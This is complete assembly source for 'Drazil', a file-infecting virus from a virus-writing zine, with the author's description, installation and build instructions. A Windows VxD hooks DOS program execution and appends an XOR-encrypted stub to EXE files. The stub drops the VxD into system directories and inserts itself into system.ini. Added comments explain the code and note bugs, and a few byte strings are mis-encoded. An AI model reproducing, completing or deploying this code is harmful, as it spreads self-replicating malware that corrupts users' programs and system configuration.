SLAM3.033: Encrypted vxd exe infector *Drazil* by Reptile
Comment @ Drazil by Reptile
This virus is an encrypted vxd exe infector.
The vxd (dzl.386) infects exe files (not ne/pe) on execution (4b00h) in the standard manner. It restores the time/date/attributes of the victims, and its size is 5142 bytes, because you'll need the Windoze 3.11 DDK to compile it (argh!). But anyway Drazil increases hosts only :) by 2869 bytes (it doesn't store the 2778 bytes of zeros, which are created by masm). To mark a file as infected, the virus takes a random value (8 bit) and xors it with 255, then writes the random byte to offset 12h of the exe header and its complement to offset 13h.
When an infected file is run, the encrypted (just a little, so you can't see the conspicuous strings) real-mode portion checks for the vxd and then jumps back to the host; if the vxd isn't found, it places dzl.386 in the 'c:\windows\system', 'c:\windows.000\system' or 'c:\win95\system' directory and adds it to system.ini. Then it shows 'Error: [Drazil] by Reptile' (payload) and terminates. After the next reboot the vxd is in memory and infects every executed exe file.
To install Drazil run the file infected.exe or copy the vxd to one of the three usable paths, then add manually the line 'device=dzl.386' to the [386Enh] section of the system.ini and do a reboot.
This virus should also work under Windoze 3.xx, but I'm not sure coz I couldn't test it.
If one of the three paths is available Drazil is *highly* infectious. When I tested it, my whole system was really fast infected. So use it with care! :)
Compiling dzl.386: (.386p code)
masm5 -p -w2 dzl.asm
link386 dzl.obj,dzl.386,,,dzl.def
addhdr dzl.386
Compiling drazil.inc: (.286 code)
tasm /m2 drazil.asm
tlink /t drazil.obj
file2db drazil.com (or another db generator)
modify drazil.dat
@
.386p                                   ; 32-bit protected-mode code: this half is the VxD (ring 0)
.xlist
include vmm.inc                         ; Windows 3.1x/95 DDK VMM macros (Declare_Virtual_Device, Hook_V86_Int_Chain, ...)
.list
; Virtual device declaration: name DZL, version 1.0, control procedure
; DZL_Control, no fixed device ID and no init-order constraint.
Declare_Virtual_Device DZL, 1, 0, DZL_Control, Undefined_Device_Id, \
Undefined_Init_Order,,
VxD_Locked_Data_Seg                     ; page-locked: touched from the int 21h hook at interrupt time
; drazil.inc is the generated byte image of the real-mode stub (see drazil.asm
; and the build notes). Labels referenced below but not visible on this page
; (start, vend, encstart, encend, encval, sseg, ssp, csip, store, dropname1..3)
; presumably come from it.
include drazil.inc ;realmode code image
header db 512 dup (0)                   ; scratch copy of a victim's MZ header
VxD_Locked_Data_Ends
VxD_Locked_Code_Seg
; DZL_Device_Init — runs on Init_Complete (dispatched from DZL_Control).
; Tries the three hard-coded paths for the dropped dzl.386, reads its first
; 2342 bytes into `store` (so the resident copy carries a droppable image;
; the real-mode stub writes the same 2342-byte block from `drop`), then
; hooks the V86 int 21h chain. Returns with CF clear in every case, so the
; device reports success even when no copy of itself is found.
BeginProc DZL_Device_Init
mov ax,3d02h ;open the vxd              ; DOS open, read/write
lea edx,dropname1 ;in the 'c:\windows\system' dir
vxdint 21h                              ; DDK macro: issue the DOS call from the VxD
jnc short rd
mov ax,3d02h ;open the vxd
lea edx,dropname2 ;in the 'c:\windows.000\system' dir
vxdint 21h
jnc short rd
mov ax,3d02h ;open the vxd
lea edx,dropname3 ;in the 'c:\win95\system' dir
vxdint 21h
jc short e ;skip it                     ; nothing found anywhere: no hook is installed
rd:
xchg ax,bx                              ; bx = file handle
mov ah,3fh ;store the first part of the vxd
mov cx,2342
lea edx,store                           ; `store` is defined in drazil.inc, not visible here
vxdint 21h
jc short e ;skip it                     ; NOTE(review): on a failed read the handle is never closed
mov ah,3eh
vxdint 21h
mov eax,21h ;install int 21h handler
mov esi,offset32 int21h
VMMcall Hook_V86_Int_Chain              ; from now on int21h sees every V86 int 21h
e:
clc                                     ; always report success to the VMM
ret
EndProc DZL_Device_Init
; int21h — V86 int 21h hook installed by DZL_Device_Init.
; Only DOS EXEC (AX=4B00h) is handled: the file about to be executed is
; opened and, if it passes the filters below, the XOR-encrypted real-mode
; stub is appended and the MZ header is repointed at it. Every path ends
; with CF set, which (per the DDK's Hook_V86_Int_Chain convention — carry
; set = not consumed, pass on; confirm against vmm.inc) hands the call to
; the next hook / original handler, so the EXEC itself still proceeds and
; the freshly infected file is what runs.
; Register roles on entry: ebp = client register frame, ebx = current VM handle.
BeginProc int21h
cmp [ebp.Client_AX],4b00h ;exec call    ; anything other than EXEC is passed through untouched
jne prevhook
Push_Client_State ;save regs            ; the nested DOS calls below clobber the client frame
VMMcall Begin_Nest_Exec
; linear address of the DS:DX filename inside this VM: (DS<<4) + DX + high-linear base
movzx edx,[ebp.Client_DS] ;get the name
shl edx,4
movzx eax,[ebp.Client_DX]
add edx,eax
add edx,[ebx.CB_High_Linear]
mov ax,4300h ;save attribut             ; cx = current attributes, kept on the stack for restore
vxdint 21h
push ecx
mov ax,4301h ;set normal attribut       ; force 20h (archive only) so r/o, hidden and system hosts open r/w
mov cx,20h
vxdint 21h
mov ax,3d02h ;open file
vxdint 21h
jc exit                                 ; NOTE(review): the saved attribute word is still on the stack
                                        ; here, so Pop_Client_State runs 4 bytes off, and the host
                                        ; keeps the forced 20h attribute
xchg ax,bx                              ; bx = file handle (ebx is no longer the VM handle from here)
push edx ;save the name
mov ax,5700h ;save time/date            ; cx:dx = time:date, restored in cfile
vxdint 21h
push ecx
push edx
mov ah,3fh ;read header                 ; 512 bytes into `header`; a short or failed read is not checked
mov cx,512
lea edx,header
vxdint 21h
; --- victim filters: any miss falls through to cfile (cleanup only) ---
cmp word ptr [header],'ZM' ;exe?        ; MZ signature
jne cfile
cmp word ptr [header + 0ch],0ffffh ;allocate all mem?   ; only hosts whose max-alloc field is FFFFh
jne cfile
cmp word ptr [header + 18h],40h ;win exe?   ; relocation-table offset 40h = new-style (Windows) executable layout: skip
je cfile
;don't infect command.com               ; author's fingerprints on the word at 40h; values not verifiable from here
cmp word ptr [header + 40h],'9' ;german command.com?
je cfile
cmp word ptr [header + 40h],'2l' ;english command.com?
je cfile
; infection marker: byte[13h] == byte[12h] XOR FFh (the checksum field is reused).
; Detection artifact: a scanner can check the same relation.
mov al,[header + 12h] ;infected?
xor al,255
cmp byte ptr [header + 13h],al
je cfile
;save ss:sp                             ; host entry point is stored into the stub image (sseg/ssp/csip)
mov ax,word ptr [header + 0eh]
mov sseg,ax
mov ax,word ptr [header + 10h]
mov ssp,ax
;save cs:ip
mov eax,dword ptr [header + 14h]
mov csip,eax
mov ax,4202h ;eof                       ; dx:ax = file size; file pointer is now at EOF for the append
xor cx,cx
cwd
vxdint 21h
;calc new cs:ip                         ; size/16: ax = paragraphs, dx = byte offset inside the paragraph
mov cx,16
div cx
sub ax,word ptr [header + 8]            ; minus header size in paragraphs -> load-relative CS
mov word ptr [header + 14h],dx          ; new IP
mov word ptr [header + 16h],ax          ; new CS
add dx,vend ;calc stack                 ; `vend` comes from drazil.inc (not visible): SP is placed past the stub
mov word ptr [header + 0eh],ax          ; new SS = new CS
mov word ptr [header + 10h],dx          ; new SP
;8 bit xor encryption                   ; key = low byte of PIT channel 0 (port 40h), retried until nonzero
rdnm:
in al,40h
or al,al
je rdnm
mov byte ptr [encval],al ;save random value   ; becomes the imm8 of the stub's `mov al,imm8` decryptor
mov edi,offset32 encstart               ; encrypt the resident stub image in place
mov cx,encend - encstart
xl:
xor byte ptr [edi],al
inc edi
loop xl
;write virus                            ; append start..vend at EOF
mov ah,40h
mov cx,vend - start
mov edx,offset32 start
vxdint 21h
;undo                                   ; decrypt the resident image again so it is plain for the next victim
mov al,[encval]
mov edi,offset32 encstart
mov cx,encend - encstart
xll:
xor byte ptr [edi],al
inc edi
loop xll
mov ax,4202h ;eof                       ; new file size -> dx:ax
xor cx,cx
cwd
vxdint 21h
mov cx,512 ;calc pages                  ; pages = ceil(size/512), last-page bytes = size mod 512
div cx
or dx,dx
jz short np
inc ax
np:
mov word ptr [header + 4],ax            ; page count
mov word ptr [header + 2],dx            ; bytes in last page
mov ax,4200h ;bof
xor cx,cx
cwd
vxdint 21h
rnd:
in al,40h ;set infection flag           ; fresh nonzero random byte -> [12h], its complement -> [13h]
or al,al
je rnd
mov byte ptr [header + 12h],al
xor al,255
mov byte ptr [header + 13h],al
mov ah,40h ;write new header            ; 1Dh = 29 bytes, covering every field patched above (2,4,0Eh..17h)
mov cx,1dh
lea edx,header
vxdint 21h
cfile:                                  ; cleanup for an opened host, infected or filtered out
mov ax,5701h ;restore time/date
pop edx
pop ecx
vxdint 21h
mov ah,3eh
vxdint 21h
pop edx ;restore name
mov ax,4301h ;restore attribut
pop ecx
vxdint 21h
exit:
VMMcall End_Nest_Exec
Pop_Client_State
prevhook:
stc                                     ; CF set: not consumed, chain to the next handler
ret
; Data bytes parked in the code segment after the ret; never executed.
; The quoted characters are mis-encoded in this transcription.
redwopdrazilcigamecin db '˙˘',7,'+**+',7,'˘˙'
EndProc int21h
; DZL_Control — VxD control-message dispatcher. Only Init_Complete is
; handled (-> DZL_Device_Init); every other message is acknowledged with
; CF clear, i.e. "handled, nothing to do".
BeginProc DZL_Control
Control_Dispatch Init_Complete,DZL_Device_Init
clc
ret
EndProc DZL_Control
VxD_Locked_Code_Ends
VxD_Real_Init_Seg
; DZL_Real_Mode_Init — real-mode init hook called while Windows loads the
; VxD. Returns Device_Load_Ok with bx = si = 0 (per the DDK convention
; presumably "no instance data, no reference data" — confirm in vmm.inc).
BeginProc DZL_Real_Mode_Init
xor bx,bx
xor si,si
mov ax,Device_Load_Ok
ret
EndProc DZL_Real_Mode_Init
VxD_Real_Init_Ends
End
┌──────────────────────────────────────────────────────────────────────────────┐
│ File: Drazil.asm                                                             │
└──────────────────────────────────────────────────────────────────────────────┘
;Drazil's real mode portion             ; 16-bit stub appended to each host; runs before the host's entry point
.286
.model tiny
.code
org 100h
; Layout note: the VxD appends start..vend to the host and patches encval,
; sseg, ssp and csip in the copy it writes, so this stub has no fixed load
; offset — all data is reached through bp (the delta computed below).
start:
;get delta                              ; bp = actual offset of `drazil` minus its assembled offset
call $ + 3
drazil:pop bp
sub bp,offset drazil
push ds ;coz psp                        ; DS = PSP segment at EXE entry; needed to rebuild the host's SS/CS
push cs
pop ds
;decrypt it                             ; the key byte lives inline in the instruction below
db 176 ;mov al                          ; opcode of mov al,imm8 ...
encval db 0                             ; ... and its imm8: patched per infection by the VxD
lea di,[bp + offset encstart]
mov cx,encend - encstart
xd:
xor byte ptr [di],al
inc di
loop xd
encstart:                               ; everything from here to encend is stored XOR-encrypted
;get the windoze path                   ; probe three hard-coded system.ini locations (attribute forced to 20h first)
lea dx,[bp + offset sysini1]
call attr
mov ax,3d02h ;c:\windows\system.ini?
int 21h
jnc win
lea dx,[bp + offset sysini2]
call attr
mov ax,3d02h ;c:\windows.000\system.ini?
int 21h
jnc win000
lea dx,[bp + offset sysini3]
call attr
mov ax,3d02h ;c:\win95\system.ini?
int 21h
jc e                                    ; no system.ini found: run the host untouched
win95:
push ax ;save handle                    ; system.ini handle
mov ax,3d00h ;check if dzl.386 is already installed  ; read-only open used as an existence test
lea dx,[bp + offset dropname3] ;c:\win95\system\dzl.386
int 21h
jc inst
ee:
;exe return                             ; already installed: drop the system.ini handle from the stack
pop ax                                  ; NOTE(review): neither this handle nor the dzl.386 one in ax is closed
                                        ; (both stay open until the host terminates)
e:
;exit: jmp back to the victim           ; rebuild the host's original SS:SP and CS:IP relative to the load segment
pop ax ;psp
add ax,10h                              ; ax = PSP + 10h = load segment (the PSP is 100h bytes)
add word ptr [bp + offset csip + 2],ax  ; relocate the saved CS
;stack
db 5 ;add ax                            ; opcode of add ax,imm16 ...
sseg dw 0fff0h ;test                    ; ... imm16 = host SS (patched by the VxD; this is only a test default)
mov ss,ax
db 0bch ;mov sp                         ; opcode of mov sp,imm16 ...
ssp dw 0fffeh                           ; ... imm16 = host SP (patched)
db 0eah                                 ; opcode of far jmp seg:off ...
csip dd 0fff00000h                      ; ... host CS:IP (patched; CS relocated above)
win:
push ax                                 ; system.ini handle
mov ax,3d00h
lea dx,[bp + offset dropname1] ;c:\windows\system\dzl.386
int 21h
jc inst
jmp ee
win000:
push ax                                 ; system.ini handle
mov ax,3d00h
lea dx,[bp + offset dropname2] ;c:\windows.000\system\dzl.386
int 21h
jnc ee
inst:
mov ah,3ch ;nope: install dzl.386       ; create with attributes 0 (dx still points at the chosen dropname)
xor cx,cx
int 21h
xchg ax,bx                              ; bx = dzl.386 handle
mov ah,40h ;write the first part of the vxd   ; 2342 bytes carried in `drop`
mov cx,2342
lea dx,[bp + offset drop]
int 21h
;write the zeros (by masm) - masm sux!  ; 2778 zero bytes, written one at a time from rbuf (still 0 at this point)
mov cx,2778
lk:
push cx
mov ah,40h
mov cx,1
lea dx,[bp + rbuf]
int 21h
pop cx
loop lk
mov ah,40h ;write the end               ; 22-byte DDB tail; 2342+2778+22 = 5142, the size quoted in the header text
mov cx,22
lea dx,[bp + offset ddb] ;this is the end...
int 21h
mov ah,3eh
int 21h
;load the vxd in the system.ini         ; insert 'device=dzl.386' right after the [386Enh] section header
pop bx ;handle                          ; system.ini handle
push cs
pop es
mov ax,4202h ;get file size             ; only ax (low 16 bits) is kept: a system.ini >= 64 KB is mishandled
xor cx,cx
cwd
int 21h
push ax
mov ax,4200h ;bof
xor cx,cx
cwd
int 21h
cd:
mov ah,3fh ;search the [386Enh] section ; byte-at-a-time scan for 'n' followed by "h]"
mov cx,1
lea dx,[bp + offset rbuf]
int 21h
or ax,ax
je cd                                   ; NOTE(review): ax = 0 means EOF, so a system.ini without "nh]" spins here forever
cmp [bp + rbuf],'n' ;[386E'n'h]
jne cd
mov ah,3fh ;really?
mov cx,2
lea dx,[bp + offset rbuf]
int 21h
cmp word ptr [bp + rbuf],']h'           ; matches any "...nh]", not only [386Enh]
jne cd
mov ax,4201h ;save current offset       ; dx:ax = offset just past the matched "nh]"
xor cx,cx
cwd
int 21h
pop cx                                  ; cx = file size (low word)
push ax
sub cx,ax ;read the second part of the file   ; cx = bytes remaining after the match
mov ah,3fh
lea dx,[bp + offset rbuf]               ; rbuf is 1 byte: the read deliberately overruns into the strings,
int 21h                                 ; `drop` and whatever follows the stub (none of it is needed any more)
mov ax,4200h ;go back
pop dx
push cx                                 ; cx = remainder length, kept for the write below
xor cx,cx
int 21h
mov ah,40h ;insert 'device=dzl.386'     ; 16 bytes: CR LF + 'device=dzl.386'
mov cx,16
lea dx,[bp + offset dropstring]
int 21h
mov ah,40h ;write the second part of the file
pop cx
lea dx,[bp + offset rbuf]
int 21h
cfile:
mov ah,3eh
int 21h
exit:
;payload                                ; on the install run the host is NOT executed: print the message and exit
mov ah,09h ;I'm a Lizard
lea dx,[bp + offset error]
int 21h
mov ah,4ch
int 21h
; attr — set the attributes of the file named at DS:DX to 20h (archive
; only) so a read-only/hidden/system system.ini can be opened read/write.
; Clobbers ax, cx and flags; the result is ignored by every caller.
attr proc near
mov ax,4301h ;change attribut
mov cx,20h
int 21h
ret
attr endp
error db 'Error: [Drazil] by Reptile$'   ; payload text (int 21h/09h, '$'-terminated); a clear string indicator once decrypted
dropstring db 13,10,'device=dzl.386'      ; 16 bytes, matches the cx=16 write into system.ini
; 22-byte tail of the dropped VxD image (its DDB). The quoted characters are
; mis-encoded in this transcription, so the exact byte values are not
; recoverable from this page.
ddb db '3€3ˆ∏',0,0,'√',0,0,0,7,'DZL_DDB',1,0,0
rbuf db 0 ;readbuffer                     ; also the 1-byte zero source for the 2778 padding writes
dropname3 db 'c:\win95\system\dzl.386',0 ; drop targets; one is chosen by which system.ini opens
dropname2 db 'c:\windows.000\system\dzl.386',0
dropname1 db 'c:\windows\system\dzl.386',0
sysini3 db 'c:\win95\system.ini',0
sysini2 db 'c:\windows.000\system.ini',0
sysini1 db 'c:\windows\system.ini',0
drop db 2342 dup (?)                      ; first 2342 bytes of the VxD image; presumably filled from drazil.dat per the build notes
encend:                                   ; end of the XOR-encrypted region
ends
end start